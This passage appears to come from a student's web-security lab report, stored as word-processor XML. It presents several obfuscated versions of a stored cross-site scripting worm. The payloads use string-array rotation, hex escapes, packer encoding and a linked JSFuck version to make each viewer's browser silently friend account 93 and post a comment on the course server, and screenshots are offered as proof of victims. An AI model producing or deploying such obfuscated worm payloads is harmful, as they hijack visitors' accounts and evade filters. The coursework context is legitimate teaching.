      </w:r>
    </w:p>
    <w:p w14:paraId="2D0EA2A8" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getMonth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2582C107" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2433F3A6" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    'GET',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7816F36E" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    'http://csec380-core.csec.rit.edu:86/add_comment.php?id=93&amp;comment=',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2385B1C8" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    'send',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B021202" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    'open',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7979B416" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE9645" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7ACA8" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    'Content-type',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36078FD5" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    'Friended\x20on\x20'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25C04F" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524F800C" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t>(function (_0x4936c0, _0x54168d) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF03509" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> _0x28c543 = function (_0x5853e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F6A97" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">        while (--_0x5853e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66191844" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">            _0x4936c0['push</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_0x4936c0['shift']());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4DAD1" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0B7643" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C4EFBD" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    _0x28c543(++_0x54168d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DE1D4" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>}(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_0x5db5, 0x1d1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253D5663" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> _0x3f0e = function (_0x4ce927, _0x3bd3de) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D27DBAC" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    _0x4ce927 = _0x4ce927 - 0x0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2328CE" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> _0x2d9663 = _0x5db5[_0x4ce927];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E14014" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t xml:space="preserve">    return _0x2d9663;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4463FF8E" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4FBE95" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xhttpAddFriend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 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4D4F255B" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xhttpAddFriend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[_0x3f0e('0x0'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_0x3f0e('0x1'), 'http://csec380-core.csec.rit.edu:86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>add_friend.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=93', !![]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7058FBFB" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xhttpAddFriend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[_0x3f0e('0x2'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_0x3f0e('0x3'), 'application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7C9EA" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xhttpAddFriend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>['send</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B99E80E" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> d = new </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Date(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6836F4" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> comment = _0x3f0e('0x4') + d[_0x3f0e('0x5'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) + '-' + d[_0x3f0e('0x6')]();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B110EA0" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xhttpComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = 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786ADDBF" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xhttpComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[_0x3f0e('0x0'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>_0x3f0e('0x7'), _0x3f0e('0x8') + comment, !![]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C9EF7C" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B" w:rsidP="00851E6B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xhttpComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[_0x3f0e('0x9'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>)](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF52EB3" w14:textId="77777777" w:rsidR="00A8060C" w:rsidRDefault="002A11D1">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D943F" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="0BFCFB3F" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="033F68DF" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="32A6E357" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="476C6084" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="4CD656E8" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="7A94ECF2" w14:textId="31A8788C" w:rsidR="00BA7844" w:rsidRDefault="002A11D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20F8A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OBFUSCATED CODE 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27256F8C" w14:textId="77777777" w:rsidR="00B20F8A" w:rsidRPr="00B20F8A" w:rsidRDefault="00B20F8A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E52EB23" w14:textId="77777777" w:rsidR="002A11D1" w:rsidRDefault="002A11D1">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1374DC" w14:textId="77777777" w:rsidR="002A11D1" w:rsidRDefault="002A11D1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t xml:space="preserve"> _0x1e22=["\x50\x4F\x53\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x63\x73\x65\x63\x33\x38\x30\x2D\x63\x6F\x72\x65\x2E\x63\x73\x65\x63\x2E\x72\x69\x74\x2E\x65\x64\x75\x3A\x38\x36\x2F\x61\x64\x64\x5F\x66\x72\x69\x65\x6E\x64\x2E\x70\x68\x70\x3F\x69\x64\x3D\x39\x33","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x73\x65\x6E\x64","\x46\x72\x69\x65\x6E\x64\x65\x64\x20\x6F\x6E\x20","\x67\x65\x74\x4D\x6F\x6E\x74\x68","\x2D","\x67\x65\x74\x44\x61\x74\x65","\x47\x45\x54","\x68\x74\x74\x70\x3A\x2F\x2F\x63\x73\x65\x63\x33\x38\x30\x2D\x63\x6F\x72\x65\x2E\x63\x73\x65\x63\x2E\x72\x69\x74\x2E\x65\x64\x75\x3A\x38\x36\x2F\x61\x64\x64\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x2E\x70\x68\x70\x3F\x69\x64\x3D\x39\x33\x26\x63\x6F\x6D\x6D\x65\x6E\x74\x3D"];var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>xhttpAddFriend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>= new XMLHttpRequest();xhttpAddFriend[_0x1e22[2]](_0x1e22[0],_0x1e22[1],true);xhttpAddFriend[_0x1e22[5]](_0x1e22[3],_0x1e22[4]);xhttpAddFriend[_0x1e22[6]]();var d= new Date();</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t xml:space="preserve"> comment=_0x1e22[7]+ d[_0x1e22[8]]()+ _0x1e22[9]+ d[_0x1e22[10]]();</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>xhttpComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t xml:space="preserve">= new XMLHttpRequest();xhttpComment[_0x1e22[2]](_0x1e22[11],_0x1e22[12]+ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>comment,true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>xhttpComment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>[_0x1e22[6]]()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B76D8EB" w14:textId="77777777" w:rsidR="002A11D1" w:rsidRDefault="002A11D1">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C5D4E" w14:textId="77777777" w:rsidR="002A11D1" w:rsidRDefault="002A11D1"/>
    <w:p w14:paraId="0D74C259" w14:textId="4211FF7D" w:rsidR="00BA7844" w:rsidRDefault="002A11D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20F8A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OBFUSCATED CODE 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47833447" w14:textId="16CA6465" w:rsidR="00B20F8A" w:rsidRPr="00B20F8A" w:rsidRDefault="00B20F8A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535082D5" w14:textId="77777777" w:rsidR="002A11D1" w:rsidRDefault="002A11D1">
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="002A11D1">
        <w:t>eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?'':e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>p.replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t xml:space="preserve">(new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>RegExp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>('\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>b'+e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>(c)+'\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>b','g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>'),k[c])}}return p}('0 1=3 7();1.5(\'o\',\'6://a-c.i.j.h:g/n.e?f=b\',9);1.q("r-m","k/x-l-p-w");1.8();0 d=3 A();0 2="z y "+d.t()+"-"+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>d.s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A11D1">
        <w:t>();0 4=3 7();4.5(\'u\',\'6://a-c.i.j.h:g/v.e?f=b&amp;2=\'+2,9);4.8();',37,37,'var|xhttpAddFriend|comment|new|xhttpComment|open|http|XMLHttpRequest|send|true|csec380|93|core||php|id|86|edu|csec|rit|application|www|type|add_friend|POST|form|setRequestHeader|Content|getDate|getMonth|GET|add_comment|urlencoded||on|Friended|Date'.split('|'),0,{}))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B80F8D" w14:textId="77777777" w:rsidR="002A11D1" w:rsidRDefault="002A11D1">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A397CD2" w14:textId="77777777" w:rsidR="00822101" w:rsidRDefault="00822101"/>
    <w:p w14:paraId="0A767403" w14:textId="77777777" w:rsidR="002A11D1" w:rsidRPr="00B20F8A" w:rsidRDefault="002A11D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20F8A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OBFUSCATED CODE 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4D43F8" w14:textId="681EF598" w:rsidR="002A11D1" w:rsidRDefault="00822101">
      <w:r>
        <w:t>This was more of a</w:t>
      </w:r>
      <w:r w:rsidR="00661BB8">
        <w:t>n interesting thing I learned last semester</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and it was too big to paste the obfuscated code here directly. Here is a pastebin link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pastebin.com/pswTMX80</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> OR </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://pastebin.com/raw/pswTMX80</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (easier to copy with this one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183579BB" w14:textId="77777777" w:rsidR="00BA7844" w:rsidRDefault="00822101">
      <w:r>
        <w:t xml:space="preserve">The code can be decoded on: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.jsfuck.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and please make sure to uncheck ‘Eval Source’ before clickin</w:t>
      </w:r>
      <w:r w:rsidR="008A7B21">
        <w:t>g ‘Run This’ to see the decoded string.</w:t>
      </w:r>
      <w:r w:rsidR="003F173E">
        <w:t xml:space="preserve"> It also takes a little bit to copy everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568BBF7E" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B"/>
    <w:p w14:paraId="4A3E2654" w14:textId="77777777" w:rsidR="00851E6B" w:rsidRDefault="00851E6B"/>
    <w:p w14:paraId="4D515163" w14:textId="77777777" w:rsidR="00BA7844" w:rsidRDefault="00BA7844"/>
    <w:p w14:paraId="3C69C18D" w14:textId="77777777" w:rsidR="00BA7844" w:rsidRDefault="00BA7844"/>
    <w:p w14:paraId="40331EE1" w14:textId="77777777" w:rsidR="00BA7844" w:rsidRPr="00B20F8A" w:rsidRDefault="005E5259">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B20F8A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PROOF OF PEOPLE WHO FRIENDED ME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043483B8" w14:textId="77777777" w:rsidR="00453EB2" w:rsidRDefault="00123137">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39E10D3B" wp14:editId="09C55093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632460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535" y="21246"/>
                <wp:lineTo x="21535" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="4" name="Picture 4" descr="C:\Users\student\Downloads\drive-download-20190405T170622Z-0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drive-download-20190405T170622Z-001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EB2">
        <w:t>April 4, 2019 – 7.30PM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (1 friend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DADE57C" w14:textId="77777777" w:rsidR="00453EB2" w:rsidRDefault="00123137" w:rsidP="00453EB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="71B0DD75" wp14:editId="4FD2BE12">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1436370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6324600" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21436"/>
                <wp:lineTo x="21557" y="21436"/>
                <wp:lineTo x="21557" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5" name="Picture 5" descr="drive-download-20190405T170622Z-001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ive-download-20190405T170622Z-001/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EB2">
        <w:t>April 4, 2019 – 7.30PM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2 friends)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4349B65D" w14:textId="3DC16600" w:rsidR="00453EB2" w:rsidRDefault="00B20F8A" w:rsidP="00453EB2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36818992" wp14:editId="74D5F321">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>9525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1962150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6324600" cy="1133475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="6" name="Picture 6" descr="drive-download-20190405T170622Z-001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rive-download-20190405T170622Z-001/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EB2">
        <w:t xml:space="preserve">April </w:t>
      </w:r>
      <w:r w:rsidR="00123137">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00453EB2">
        <w:t>, 2019 –</w:t>
      </w:r>
      <w:r w:rsidR="00123137">
        <w:t xml:space="preserve"> 11</w:t>
      </w:r>
      <w:r w:rsidR="00453EB2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00123137">
        <w:t>48A</w:t>
      </w:r>
      <w:r w:rsidR="00453EB2">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00270B3C">
        <w:t xml:space="preserve"> (1 friend)</w:t>
      </w:r>
    </w:p>
